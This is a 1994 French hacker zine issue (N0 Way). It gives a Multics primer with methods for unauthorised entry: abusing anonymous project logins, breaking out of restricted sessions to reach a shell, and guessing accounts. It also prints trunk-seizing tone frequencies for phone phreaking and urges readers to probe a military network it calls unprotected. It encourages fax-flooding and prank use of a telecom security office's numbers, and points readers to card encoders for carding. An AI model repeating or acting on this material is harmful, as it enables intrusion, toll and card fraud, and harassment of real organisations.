- Le systeme est tres vaste donc ce texte ne sera qu'une presentation de
- Multics.
-
- 1 Reconnaitre un Multics:
- ------------------------
- Au login, la pluspart du temps, quand on se connecte sur un Multics, il
- affiche:
- <system> MULTICS version MRxx # où xx est le numero de la version
- Channel dhyyy at hhmm.s # yyy : canal de communication
- # hhmm.s : heure format militaire
- up since hhmm.s # date du dernier boot.
- quelques autres informations et puis plus rien:
- c'est la periode de prelogin.
-
- 1.1 Prelogin:
- ------------
- Si vous connaissez les Cyber de Control Data Corporation comme les CDC960,
- CDC980 etc... Ils sont sous NOS/VE et ont comme pour le Multics, une periode
- de prelogin.
- Celle ci est generalement limitee (environ a 2mn).
- Le prelogin comporte plusieurs commandes primaires sous Multics:
- help
- l
- et d'autres commandes de login anonyme sous un projet.
-
- En effet, la gestion des utilisateurs sous MULTICS se fait par projet.
- Il y a un responsable de projet qui dirige un groupe d'utilisateurs au point
- de vue gestion. On designe un compte comme cela:
- <Username>.<PROJECT>
- Ainsi, lors du login, on peut soit taper le nom en entier, soit taper juste
- le <Username>. Dans le dernier cas, le programme de login va detecter a quel
- projet appartient cet utilisateur.
-
- Une fonction interessante est la fonction de login anonyme.
- En connaissant juste le nom d'un projet, on peut se logger anonymement sous ce
- projet.
- La syntaxe de cette commande est donnee au prelogin par le message de la
- commande help.
-
- 1.2 Les principes:
- -----------------
- * Un utilisateur a toujours un nom qui commence par une majuscule. Ce compte
- fait toujours partie d'un groupe appele 'projet'. On peut donc se logger
- anonymement sous un projet sans avoir de nom de compte. On sera donc
- identifie comme anonyme du projet xxxxx.
- Un user peut faire partie de plusieurs projets.
- * Le nom du projet xxxxx doit avoir pour premiere lettre une majuscule.
- * Un 'segment' est le nom donne sous multics aux fichiers.
- * un chemin est indique non pas avec des slash ('/') comme sous unix mais
- avec des signes superieur: '>'
- ex: >udd>PROJET>User
- * le directory >udd> est le directory qui contient toutes les infos concernant
- le utilisateurs.
- * Se deplacer dans l'arborescence:
- Si l'on est dans le directory: '>udd>PROJET1' et que l'on veut aller dans
- '>udd', il suffit te taper 'cwd <'.
- Si l'on est dans '>udd>PROJET1' et que l'on veut aller dans
- '>udd>PROJET2>user1', il faut taper:
- cwd <user1
- * Dans la logique Multics, < equivaut a .. sous Unix et sous DOS (peurk...
- je parle encore de cet OS pourri, le DOS.... bouhhh)
-
- 1.3 Les commandes:
- -----------------
- Voici une liste simple et absolument non exhaustive des commandes de multics;
- ce sont les principales.
- help <topic> : aide en ligne
- ls : liste des fichiers sur directory courant
- cwd <path> : pwd afficher le nom du directory courant
- cd <newpath> : creer un nouveau directory dans le directory courant
- dl <sedgment> : effacer un segment
- who : affiche un court message sur l'etat de la machine et affiche
- la liste des users actuellements connectes sur la machine.
- whom : meme chose mais en classant les utilisateurs par projets.
- sm : envoyer un message a un utilisateur online (equivalent a
- write sous unix).
- sdm : envoyer un courrier a un utilisateur.
- Si la machine est connectee a un reseau comme Internet,
- pour envoyer un mail a scc@nic.ddn.mil, il faut taper:
- sdm scc -at nic.ddn.mil
- rdm : lire sa boite aux lettres.
- memo : systeme d'agenda tres evolue.
- pr : affiche un segment a l'ecran.
- ted : editeur ligne a ligne type ED.
- emacs : editeur pleine page que vous connaissez.
- l'utilisation de cet editeur est impossible avec une
- liaison 7 bits. Il faut une liaison 8 bit pour utiliser ca!
- basic : appel du compilateur basic.
- pascal : appel du compilateur pascal.
- calendar : affichage de calendrier.
- date : affiche la date.
- time : affiche l'heure.
- st <filename> : affiche le statut d'un segment ou d'un directory.
- la : liste des droits d'acces sur un segment ou un directory.
- sa : etablit les droits d'acces sur un segment ou un directory.
- logout : quitter Multics.
- crossnet : envoyer du mail a travers differents réseaux.
-
- 2 Subversion:
- ------------
- Par la methode de login anonymous, nous pouvont subvertir MULTICS en
- reperant par un acces public qui est sous un certain projet.
- Par exemple, pour l'interogation d'une bibliotheque ou d'un guide approfondi,
- MULTICS affiche en debut de connexion des infos dont le projet.
- Il suffit ensuite de faire un login anonyme sur ce projet.
-
- Deuxieme methode.
- Lors d'une connexion dirigee comme decrite precedemment, il faut stopper le
- programme.
- Pour cela on utilisera CONTROL+Z ou CONTROL+Q ou CONTROL+S ou CONTROL+D
- ou CONTROL+D ou tout simplement un BREAK ou si vous avez un ATTN.
- Ensuite, par la commande 'pi', on peut recuperer un interpreteur de commande.
-
- Methode traditionnelle:
- Eh bien, ca vous connaissez... TRY !!!! (in harlem brown.... ;-) private joke)
- N'oubliez jamais que le permier caractere de Username doit toujours etre en
- majuscule. Essayez les entrees communes.
- ex: SysDaemon (celui ci, je l'ai jamais vu 'open')
-
- 3 Then... the end:
- -----------------
- Bon, j'avoue que ce texte est laconique mais ce systeme est tellement complet
- et tellement peu repandu, que ce serait de la perte de temps de vous expliquer
- tout si vous n'avez pas de becanne pour tester.
-
- So long HPC[A]s men.
-
-
- -%!% N0 Way %!%-
-
- Volume I, Numéro 3, Partie 3.18
-
-
- :) :-) ;) ;-) :\ :/ <:) *:) :} :{ 8)
- ?) Tel - Trixx |)
- @) By %)
- B) NeurAlien I)
- :) :-) ;) ;-) :\ :/ <:) *:) :} :{ 8)
-
- -
- 7 Septembre 1994
- -
- "A new race of hacker seems to be born, Ultimate Hackers" --Anonymous
-
-
- Hohe les Hack/phreakERS, les telcos évoluent et nous aussi. En exclusivité
- quelques news d'un peu partout dans le monde qui vont vous faire sauter au
- plafond.
-
- Tout d'abord la HOPE (Hacking On Planet Earth) s'est déroulée dans le chaos le
- plus complet. Il y avait beaucoup de "well known hackers" et quelques
- évennements interressants s'y sont déroulés.
- (Knight Lightning & Taran King molestent (tentent tout au moins) une fille
- pendant qu'ils discutent avec Win Schwartau et Agent Steal)
- L'unix mis a disposition des participant a été hacké comme on pouvait s'y
- attendre.
- ("Hey Razor, have a look at them... It could help...
- - Why?? I haven't been hacked... No... NOOOOOOOOOO... NOoOOoOooOoOO!!! You
- hacked my system?")
- Le nouveau systeme du métro de new york qui constituait le deuxième défi aux
- hackers a lui aussi été vaicu. Il paraitrait (je ne l'ai pas vu) que la
- personne l'ayant hacké soit actuellement recherchée. :)
- (Fucking Pigz, GET A LIFE ! )
-
- Au niveau des * Boxes, ca a fonctionné dur apparemment dans une folie
- démoniaque. Certains pays semblent avoir été ouverts et une effervescence chez
- les phone phreaks semble confirmer les bruits de grands "breakthrough" en
- matière de phreaking. (R2 etc...)
-
- Le X25 semblait mort, SevenUp nous dit le contraire: plusieurs centaines
- d'appels par semaine sur SecTec. La nostalgie des anciens fait toujours peur
- aux admins pour leur facture X25. (Hey Dale Drew, GET A LIFE !)
-
- Allez, un ptit amuse gueule pour les lecteurs de N0 Way:
- Frequences pour la malaisie:
- Key Forward: 2600 + 2400 Hz : 150 ms
- Between: 2000 ms
- Seize: 2400 Hz : 150 ms
- Intervals: 150 ms
-
- CCITT5:
- ======
- Tiens, info de nos amis de Hollande j'ai nomme Hack-Tic:
- CCITT 5 serait utilisé au : Chili,
- Philippines
- South Africa
- Colombie
- Bresil
- Essayez pour voir si ca passe...
-
- Bribes récoltées un peu partout:
- ===============================
- Saviez vous que GN Navetel fournit à la gendarmerie Canadienne des solutions
- pour ecouter les transmissions de données et plus particulierement:
- - les comms modems sur les BBS jusqu'au vitesse 28800.
- - les comms satellites vers Taiwan & Singapour envoyées à 2Mbit/s aux
- satellites par des "emissaires" de ces pays.
-
- Afrique du Sud:
- ==============
- 2400/2600 puis 2400
- Timings: 150/0/90/0 toujours en ms bien sûr
-
- Chili:
- =====
- 2400 ou 2550 pendant 3 secondes
- seize: 2400 (ou 2460)
-
- The recent hack:
- ===============
- Net23 viens de se faire pirater. Net23 est un bon IP provider à New York.
- Son administrateur qui a juste 15 ans était plutot vert. Well... qu'est ce qui
- a pris aux hackers de lui modifier son kernel, de lui enlever netstat et ps?
- Bref... pas kewl pour lui.
-
- R2:
- ==
- Pour seize'r un trunk en R2, il faut envoyer:
- 2040/2400 OU 2400/2400
- ou == ou
- 2280 2280
- ou ou
- 3000 3000
-
- Nouvelles de l'armée:
- ====================
- L'armée francaise a un beau reseau TCP/IP interne. C'est tres joli et c'est
- dur d'y acceder. Mais alors, c'est COMPLETEMENT NUL AU NIVEAU PROTECTION:
- des entrees avec root sans mot de passe!
- tftp actif sur toutes les machines !
- rexd en standard sur tous les HP.
- Vous voulez vous marrer, essayez de votre caserne preférée ! :)
-
- Quelqu'un à faire chier:
- =======================
- Service de securité de chez... FT:
- Tel: (1) 44 44 22 22
- Fax: (1) 42 68 19 38
- Vous avez mon approbation pour donner le 44 44 22 22 comme numéro a vérifier
- pour les achats par carte bleue ou numéro de rappel pour France Telecom pour
- les renseignements quand vous etes dans une cabine.
- Je suis aussi d'accord avec le fait que vous utilisiez votre fax modem pour
- envoyer 450 pages NOIRES au 42 68 19 38 !
-
- La blague du jour:
- =================
- "Comment transforme t'on un 486 en un 8088?"
- "- En installant windows."
- [Kopyrite Phrack 46]
-
- Mag stripe Reader / Coder:
- =========================
- Beaucoup de personnes recherches des lecteurs encodeurs de cartes magnétiques.
- Voila ou les acheter...
- CPU ADvance
- Post Office Box 2434
- Harwood Station
- Littletown, MA 01460
- USA
- Fax: 508-624-4819
-
- L'unité coute 389 $ US et il y a 2 modeles:
- un lecteur pr les pistes ISO 1 & 2
- un autre pour les pistes ISO 2 & 3
- Hehe.... Bon carding...
-
- N0 Way recrute:
- ==============
- Si la nuit vous revez (a part les trucs crades) aux catas, aux reseaux, aux
- ordis, a la chasse aux inspecteurs, au trashing, a l'escalade des batiments de
- FT.
- Si votre oreiller est un Cisco 7000.
- Si vous avez chez vous une antenne parabolique de 4 m de diametre motorisee
- pour suivre les satellites de l'armee.
- Si vous ne vous servez que d'une socket en raw IP pour faire du RPC.
- Si vous vous servez de votre cafetiere pour faire des pates au café ;).
- Si vous aimez router vous memes vos paquets en Source Routing.
- Si vous etes né dans une éprouvette de LSD 25.
-
- Alors nous avons besoin de vous pour ecrire des article dans N0 Way sur les
- trucs les plus délirant, les plus techniques et les plus éclatants.
-
- ! Have phun wif that ! ++NeurAlien
-
- On to the next one, on to the next one ! ! ! ++N.
-